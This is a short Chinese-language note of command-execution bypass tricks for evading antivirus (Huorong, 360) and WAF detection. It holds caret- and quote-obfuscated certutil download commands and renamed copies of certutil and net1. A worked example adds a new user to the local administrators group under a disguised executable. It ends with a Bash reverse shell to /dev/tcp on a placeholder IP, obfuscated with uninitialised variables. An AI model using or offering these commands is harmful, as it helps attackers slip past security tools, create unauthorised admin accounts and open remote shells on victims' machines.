命令执行绕过

命令执行绕过

前言：仅提供一些绕过思路，对于较为敏感的命令基本已经失效了

1、多空一格

2、^混淆

certutil -u^rl^cache

3、拷贝文件名

copy C:\Windows\System32\certutil.exe xx.exe

之前绕过火绒添加用户案例

copy c:\windows\system32\net1.exe d:\update.exe

d:\update.exe user newuser password123 /add

net localgroup administrators newuser /add

4、修改文件资源绕过360

5、""混淆

ce""""rtu""til -url""""ca""che -spl""""it -f

6、未初始化变量绕过

在Linux中，可以利用Bash的未初始化变量来逃避Waf的检测。未初始化的变量会被视为一个空字符串。如果你尝试引用一个未初始化的变量 $u，它不会报错，而是会返回一个空值。

/bin$u/bash$u -i$u >&$u /dev$u/tcp$u/xx.xx.xx.xx$u/5003$u 0>&1$u